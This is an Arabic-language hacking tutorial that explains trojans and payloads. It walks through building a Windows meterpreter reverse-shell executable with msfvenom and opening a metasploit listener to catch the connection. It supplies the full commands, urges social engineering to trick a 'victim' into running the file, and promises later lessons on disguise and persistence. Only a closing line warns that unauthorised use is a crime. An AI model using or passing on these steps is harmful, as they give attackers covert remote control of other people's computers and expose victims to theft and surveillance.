سوف نتعرف علي اهم طريقه من طرق الاختراق وهي الاختراق عن طريق بايلود او مايسمي ب trojan ماهو البايلود وماهو مصطلح trojan . اولا البايلود او payload هو عباره عن حموله برمجيه بمعني اكواد خبيثه يتم تحويلها علي شكل برنامج تنفيذي يعمل علي النظام مهام هذه الحموله هي فتح جلسه اتصال بين المخترق والضحيه وتتيح له التحكم بكامل النظام . trojan هو مطلح شائع في مجال الاختراق الفكره نفسها ماخوزه من فيلم troy عندما ارادو اقتحام القلعه ادخلو حصان خشبي كبير وبداخله عددا من الجنود ليفتحو ابواب القلعه ويتمكن الجيش من الدخول كيف استفاد الهاكرز من هذه الفكره . نرجع الي البايلود الذي تحدثنا عنه البايلود سوف يكون علي شكل برنامج تنفيذي عند ارساله الي الضحيه بشكله الاصلي سوف يثير الشك وهنا تاتي فكره trojan اخفاء البايلود في صوره او مستند نصي او اي شيئ لا يثير الشك . الان سوف نستكمل ونعرف كيف يحدث هذا خطوخ بخطوه
انشاء بايلود اختراق
سوف نقوم بانشاء بايلود باستخدام اطارالعمل الشهير metasploit يمكنك البحث عنه ومعرفه كل التفاصيل ولاكن سوف اعطيك نبذه عنه. هذا اطار عمل يحتوي بداخله مجموعه كبيره من استغلال للثغرات والبايلود التي يمكن ان نختار واحد منها لتنفيذ عمليه الاختراق
الان سوف نستخدم هذا الاطار وهناك اداه فرعيه داخل الاطار تسمي ب msfvenom هذه الوحده مسؤله عن انشاء payloads
نقوم بفتح موجه الاوامر في نظام لينكس ونكتب هذا السطر
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Yor_IP LPORT=Your_Port -f exe -o payload.exe
ملحوظه
هنا تغير your_ip الي عنوان ip الخاص بك و your_port الي المنفذ الخاص بك مع اختيار البايلود المناسب لك نحن قد اخترنا meterpreter خيار p- يحدد نوع البايلود خيار f- يحدد شكل الملف نحن اخترنا exe ملف تنفيذي يعمل علي نظام ويندوز خيار o- يحدد مكان حفظ الملف نحن كتبنا اسم البايلود فقط سوف يحفظ في مجلد العمل الحالي
ارسال ملف البايلود الي الضحيه
بعد انشاء البايلود نقوم بارساله الي الضحيه لكي يقوم بفتحه هذه العمليه صعبه نوعا ما . خصوصا اذا كنت لاتعرف الشخص الذي تريد اختراقه هنا يجب عليك استخدام مهاراتك لاقناع الضحيه بفتح الملف هناك علم يستخدمه الهاكرز لهذه الخطوه يسمي social engineering الهندسه الاجتماعيه كيف تتلاعب بافكار وتوجهات الاشخاص لاقناعهم بما تريد يجب عليك جمع معلومات عن الشخص المستهدف لكي تعرف الطريقه المناسبه لاقناعه بفتح الملف
فتح جلسه استماع ميتاسبلويت
بعد مرحله انشاء البايلود وارساله الي الضحيه نفتح جلسه استماع اي بمعني نجعل النظام الخاص بنا يقوم بالاستماع لكي يتلقي الاتصال من الضحيه بعد فتح ملف البايلود نقوم بتشغيل وحدة msfconsole المجوده في اطار metasploit . الان نقوم بفتح موجه الاوامر ونتكتب التالي
msfconsole وننتظر حتي تفتح الاداه ثم نكتب بعض المعلومات مثل عنوان الاي بي الخاص بك والمنفذ الذي قمت بتحديده في ملف البايلود ونوع البايلود لكي يستمع النظام الي الاتصال القادم من جهاذ الضحيه نكتب التالي :
- set LHOST Your_IP هنا تضع عنوان الاي بي الخاص بك ويمكن وضع 0.0.0.0 سوف يستمع الي اي ip قد اخذه جهازك من الروتر
- set LPORT Your_Port هنا قمنا بتحديد منفذ 4444
- set PAYLOAD windows/meterpreter/reverse_tcp هنا تحدد نوع البايلود وقد قمنا باختيار meterpreter
- run / exploit هنا امر تشغيل المستمع نستخدم اي واحد منهم
الان بعد ارسال البايلود الي الضحيه وفتح المستمع قد تلقينا اتصال من الضحيه كما يظهر في الصوره يمكنك استخدام امر help لرؤيه الاومر المتاح تنفيذها علي نظام الضحيه
الخلاصه
هذه العميله تعد العمليه البدائيه للاختراق باستخدام البايلود لاننا لم نقم باضافه البايلود في ملف موثوق لايثير تشكيك الضحيه ثانيا لم نطور علي البايلود بعض الاساليب المعروفه لضمان استمراريه تشغيل البايلود تلقائيا هذه الخطوات تفيدنا في عدم تشكك الضحيه من الملف المرسل اليه و استمراريه تشغيل البايلود تلقائيا لضمان تلقي الاتصال في اي وقت ملحوظه يجب فتح المستمع قبل فتح الضحيه الملف لكي يتلقي الاتصال خطوه استمراريه تشغيل البايلود تفيدنا في عدم فقدان اتصال الضحيه وفتح المستمع في اي وقت لتلقي الاتصال هذه الخطوات سوف نقوم بشرحها بالتفاصيل في مقالات اخري
هام جدا
هذه الطرق اذا قمت باستعمالها دون ازن مسبق من الشخص الذي تجري عليه عمليه الاختراق تعد من الجرائم الالكترونيه ويعاقب عليها القانون